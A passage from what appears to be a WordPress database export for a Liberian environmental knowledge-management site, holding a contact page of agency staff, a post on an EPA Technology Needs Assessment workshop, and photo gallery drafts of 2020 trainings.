https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 11:48:38','2021-01-22 11:48:38','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3430,42,'2021-01-25 12:38:57','2021-01-25 12:38:57','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) and its partners- Global Environment Facility (GEF), and the United Nations Framework Convention on Climate Change (UNFCCC) over the weekend held a national stakeholders workshop in Paynesville, outside Monrovia as part of Technology Needs Assessment (TNA) Project implementation plan in Liberia.The gathering, which is the third national stakeholders’ workshop, solicited the inputs of stakeholders in the agriculture, coastal, and energy sectors aimed at assisting the TNA team with the development of an enabling framework for the transfer, deployment, and diffusion of the prioritized technologies. UN Environment, the UNEP-DTU Partnership also contributed to the hosting workshop.Thanks to Christopher B. Kabah, TNA Coordinator for ably organizing and executing the workshop.</p>\n<!-- /wp:paragraph -->','The EPA and its partners GEF and the UNFCCC held a national stakeholders workshop in Paynesville, outside Monrovia as part of the TNA Project implementation plan in Liberia.','','publish','closed','closed','','the-epa-and-its-partners-gef-and-the-unfccc-held-a-national-stakeholders-workshop-in-paynesville-outside-monrovia-as-part-of-the-tna-project-implementation-plan-in-liberia','','','2021-01-25 12:38:59','2021-01-25 12:38:59','',0,'https://ekmsliberia.info/?p=3430',184,'post','',0),(3431,42,'2021-01-25 12:37:36','2021-01-25 12:37:36','','','','inherit','open','closed','','epa','','','2021-01-25 12:37:49','2021-01-25 12:37:49','',3430,'https://ekmsliberia.info/wp-content/uploads/2021/01/epa.png',0,'attachment','image/png',0),(3432,42,'2021-01-25 12:38:57','2021-01-25 12:38:57','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) and its partners- Global Environment Facility (GEF), and the United Nations Framework Convention on Climate Change (UNFCCC) over the weekend held a national stakeholders workshop in Paynesville, outside Monrovia as part of Technology Needs Assessment (TNA) Project implementation plan in Liberia.The gathering, which is the third national stakeholders’ workshop, solicited the inputs of stakeholders in the agriculture, coastal, and energy sectors aimed at assisting the TNA team with the development of an enabling framework for the transfer, deployment, and diffusion of the prioritized technologies. UN Environment, the UNEP-DTU Partnership also contributed to the hosting workshop.Thanks to Christopher B. Kabah, TNA Coordinator for ably organizing and executing the workshop.</p>\n<!-- /wp:paragraph -->','The EPA and its partners GEF and the UNFCCC held a national stakeholders workshop in Paynesville, outside Monrovia as part of the TNA Project implementation plan in Liberia.','','inherit','closed','closed','','3430-revision-v1','','','2021-01-25 12:38:57','2021-01-25 12:38:57','',3430,'https://ekmsliberia.info/3430-revision-v1/',0,'revision','',0),(3433,42,'2021-02-01 09:04:27','0000-00-00 00:00:00','<!-- wp:heading -->\n<h2>CCCD Inspectors Training in Bong County in August 17-18, 2020</h2>\n<!-- /wp:heading -->\n\n<!-- wp:jetpack/slideshow {\"ids\":[\"3441\",\"3442\",\"3443\",\"3444\",\"3445\",\"3446\",\"3447\"],\"sizeSlug\":\"full\"} -->\n<div class=\"wp-block-jetpack-slideshow aligncenter\" data-effect=\"slide\"><div class=\"wp-block-jetpack-slideshow_container swiper-container\"><ul class=\"wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper\"><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3441\" data-id=\"3441\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118007112_312462773531184_4445376849983355021_n.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3442\" data-id=\"3442\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118024845_312462840197844_9178285810187896342_o-1024x612.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3443\" data-id=\"3443\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118031965_312462886864506_7678681092268067942_o-1024x618.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3444\" data-id=\"3444\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118036655_312463550197773_1815018273815766510_o-1024x597.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3445\" data-id=\"3445\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118037600_312462953531166_7196909441334733590_o-1024x862.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3446\" data-id=\"3446\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118059299_312462780197850_2229825346739181096_n.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3447\" data-id=\"3447\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118074086_312462850197843_2652956027928466277_o-1024x870.jpg\"/></figure></li></ul><a class=\"wp-block-jetpack-slideshow_button-prev swiper-button-prev swiper-button-white\" role=\"button\"></a><a class=\"wp-block-jetpack-slideshow_button-next swiper-button-next swiper-button-white\" role=\"button\"></a><a aria-label=\"Pause Slideshow\" class=\"wp-block-jetpack-slideshow_button-pause\" role=\"button\"></a><div class=\"wp-block-jetpack-slideshow_pagination swiper-pagination swiper-pagination-white\"></div></div></div>\n<!-- /wp:jetpack/slideshow -->\n\n<!-- wp:heading -->\n<h2>CCCD Media Training in Nimba August 20-22, 2020</h2>\n<!-- /wp:heading -->\n\n<!-- wp:jetpack/slideshow {\"ids\":[3449,3450,3451,3452,3453,3454,3455,3456,3457,3458,3459],\"sizeSlug\":\"full\"} -->\n<div class=\"wp-block-jetpack-slideshow aligncenter\" data-effect=\"slide\"><div class=\"wp-block-jetpack-slideshow_container swiper-container\"><ul class=\"wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper\"><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3449\" data-id=\"3449\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118010821_312467090197419_4273034739788428671_o-1024x855.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3450\" data-id=\"3450\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118036651_312467243530737_3520735325747764254_o-1024x703.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3451\" data-id=\"3451\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118049912_312467376864057_6476498378591711743_o-1024x966.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3452\" data-id=\"3452\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118072658_312467170197411_1424422127742042449_o-1024x460.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3453\" data-id=\"3453\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118081105_312467290197399_4620837734752160912_o-1024x884.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3454\" data-id=\"3454\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118114178_312467406864054_3195001015165433334_o-1024x645.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3455\" data-id=\"3455\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118129138_312467320197396_6367962160678170690_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3456\" data-id=\"3456\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118139665_312467110197417_509357946596157302_o-1024x941.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3457\" data-id=\"3457\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118247279_312467190197409_8948607088124320484_o-1024x912.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3458\" data-id=\"3458\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118257021_312467133530748_3109687021037286243_o-1015x1024.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3459\" data-id=\"3459\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118319340_312467346864060_1861816488750532017_o-1024x926.jpg\"/></figure></li></ul><a class=\"wp-block-jetpack-slideshow_button-prev swiper-button-prev swiper-button-white\" role=\"button\"></a><a class=\"wp-block-jetpack-slideshow_button-next swiper-button-next swiper-button-white\" role=\"button\"></a><a aria-label=\"Pause Slideshow\" class=\"wp-block-jetpack-slideshow_button-pause\" role=\"button\"></a><div class=\"wp-block-jetpack-slideshow_pagination swiper-pagination swiper-pagination-white\"></div></div></div>\n<!-- /wp:jetpack/slideshow -->\n\n<!-- wp:heading -->\n<h2>CCCD EKMS Learning-By-Doing Training in Buchanan, August 26-28, 2020</h2>\n<!-- /wp:heading -->\n\n<!-- wp:jetpack/slideshow {\"ids\":[\"3463\",\"3464\",\"3460\",\"3461\",\"3462\",\"3465\",\"3466\",\"3467\",\"3468\",\"3469\",\"3470\",\"3471\",\"3472\",\"3473\"],\"sizeSlug\":\"full\"} -->\n<div class=\"wp-block-jetpack-slideshow aligncenter\" data-effect=\"slide\"><div class=\"wp-block-jetpack-slideshow_container swiper-container\"><ul class=\"wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper\"><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3463\" data-id=\"3463\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118339529_315768879867240_8957022521755584142_o-1024x616.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3464\" data-id=\"3464\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118374891_315769406533854_4610821984961538987_o-1024x613.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3460\" data-id=\"3460\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118286420_315769223200539_7870423496580352605_o-1024x537.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3461\" data-id=\"3461\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118302200_315769263200535_3757459247192883262_o-1024x914.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3462\" data-id=\"3462\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118306768_315769376533857_4579108221415119983_o-1024x613.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3465\" data-id=\"3465\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118516642_318832852894176_1811083475951686199_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3466\" data-id=\"3466\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118517244_318828242894637_3179541288288323454_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3467\" data-id=\"3467\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118521094_318828412894620_1359866884748954037_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3468\" data-id=\"3468\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118531582_318831672894294_733920385961592984_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3469\" data-id=\"3469\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118532262_318828476227947_6854980371134826307_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3470\" data-id=\"3470\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118534938_318828726227922_3755715513135385658_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3471\" data-id=\"3471\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118536633_318828566227938_5387686246171594942_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3472\" data-id=\"3472\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118538060_318831209561007_4651513210745790421_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3473\" data-id=\"3473\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118580522_318831586227636_510067784901104873_o-1024x768.jpg\"/></figure></li></ul><a class=\"wp-block-jetpack-slideshow_button-prev swiper-button-prev swiper-button-white\" role=\"button\"></a><a class=\"wp-block-jetpack-slideshow_button-next swiper-button-next swiper-button-white\" role=\"button\"></a><a aria-label=\"Pause Slideshow\" class=\"wp-block-jetpack-slideshow_button-pause\" role=\"button\"></a><div class=\"wp-block-jetpack-slideshow_pagination swiper-pagination swiper-pagination-white\"></div></div></div>\n<!-- /wp:jetpack/slideshow -->\n\n<!-- wp:gallery -->\n<figure class=\"wp-block-gallery columns-0 is-cropped\"><ul class=\"blocks-gallery-grid\"></ul></figure>\n<!-- /wp:gallery -->','Photo Gallery','','draft','closed','closed','','','','','2021-02-01 09:04:27','2021-02-01 09:04:27','',0,'https://ekmsliberia.info/?page_id=3433',0,'page','',0),(3434,42,'2021-01-26 15:18:58','2021-01-26 15:18:58','<!-- wp:gallery {\"ids\":[3431,3317,3130,3125,3118,3039,2910],\"columns\":3} -->\n<figure class=\"wp-block-gallery columns-3 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/epa.png\" alt=\"\" data-id=\"3431\" data-full-url=\"https://ekmsliberia.info/wp-content/uploads/2021/01/epa.png\" data-link=\"https://ekmsliberia.info/the-epa-and-its-partners-gef-and-the-unfccc-held-a-national-stakeholders-workshop-in-paynesville-outside-monrovia-as-part-of-the-tna-project-implementation-plan-in-liberia/epa/\" class=\"wp-image-3431\"/></figure></li><li class=\"blocks-gallery-item\"><figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/nap.jpg\" alt=\"\" data-id=\"3317\" data-full-url=\"https://ekmsliberia.info/wp-content/uploads/2021/01/nap.jpg\" data-link=\"https://ekmsliberia.info/the-epa-and-the-undp-on-wednesday-january-13-2021-held-the-project-closure-meeting-for-the-national-adaptation-plan-nap-project/nap/\" class=\"wp-image-3317\"/></figure></li><li class=\"blocks-gallery-item\"><figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2020/08/118265702_641907606451023_8403732740422242380_o-1024x613.jpg\" alt=\"\" data-id=\"3130\" data-full-url=\"https://ekmsliberia.info/wp-content/uploads/2020/08/118265702_641907606451023_8403732740422242380_o.jpg\" data-link=\"https://ekmsliberia.info/epa-and-undp-host-a-week-long-ekms-learning-by-doing-training-for-it-specialists/118265702_641907606451023_8403732740422242380_o/\" class=\"wp-image-3130\"/></figure></li><li class=\"blocks-gallery-item\"><figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2020/08/117999801_638497756792008_4036954288064851198_o-1024x460.jpg\" alt=\"\" data-id=\"3125\" data-full-url=\"https://ekmsliberia.info/wp-content/uploads/2020/08/117999801_638497756792008_4036954288064851198_o.jpg\" data-link=\"https://ekmsliberia.info/epa-and-undp-host-a-two-day-training-for-female-journalists/117999801_638497756792008_4036954288064851198_o/\" class=\"wp-image-3125\"/></figure></li><li class=\"blocks-gallery-item\"><figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2020/08/ekms-1024x618.jpg\" alt=\"\" data-id=\"3118\" data-full-url=\"https://ekmsliberia.info/wp-content/uploads/2020/08/ekms.jpg\" data-link=\"https://ekmsliberia.info/inspectors-get-extra-training-to-curb-environmental-abuses/ekms-2/\" class=\"wp-image-3118\"/><figcaption class=\"blocks-gallery-item__caption\">epa</figcaption></figure></li><li class=\"blocks-gallery-item\"><figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2020/03/EPA2.jpg\" alt=\"\" data-id=\"3039\" data-full-url=\"https://ekmsliberia.info/wp-content/uploads/2020/03/EPA2.jpg\" data-link=\"https://ekmsliberia.info/epa-ends-validation-workshop-on-1st-biennial-update-report-project/epa2/\" class=\"wp-image-3039\"/><figcaption class=\"blocks-gallery-item__caption\">cross section of participants at the workshop</figcaption></figure></li><li class=\"blocks-gallery-item\"><figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_training_photo.jpg\" alt=\"\" data-id=\"2910\" data-full-url=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_training_photo.jpg\" data-link=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/featured_training_photo/\" class=\"wp-image-2910\"/><figcaption class=\"blocks-gallery-item__caption\">Photo Credit: Alloycious David. Participants at the EKMS training workshop post for a group photo.</figcaption></figure></li></ul></figure>\n<!-- /wp:gallery -->','Photo Gallery','','inherit','closed','closed','','3433-revision-v1','','','2021-01-26 15:18:58','2021-01-26 15:18:58','',3433,'https://ekmsliberia.info/3433-revision-v1/',0,'revision','',0),(3435,42,'2021-01-26 15:20:21','2021-01-26 15:20:21','<!-- wp:jetpack/slideshow {\"ids\":[\"3431\",\"3317\",\"3130\",\"3125\",\"3118\",\"3039\",\"2910\"],\"sizeSlug\":\"full\"} -->\n<div class=\"wp-block-jetpack-slideshow aligncenter\" data-effect=\"slide\"><div class=\"wp-block-jetpack-slideshow_container swiper-container\"><ul class=\"wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper\"><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3431\" data-id=\"3431\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/epa.png\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3317\" data-id=\"3317\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/nap.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3130\" data-id=\"3130\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/08/118265702_641907606451023_8403732740422242380_o-1024x613.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3125\" data-id=\"3125\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/08/117999801_638497756792008_4036954288064851198_o-1024x460.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3118\" data-id=\"3118\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/08/ekms-1024x618.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3039\" data-id=\"3039\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/03/EPA2.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-2910\" data-id=\"2910\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_training_photo.jpg\"/></figure></li></ul><a class=\"wp-block-jetpack-slideshow_button-prev swiper-button-prev swiper-button-white\" 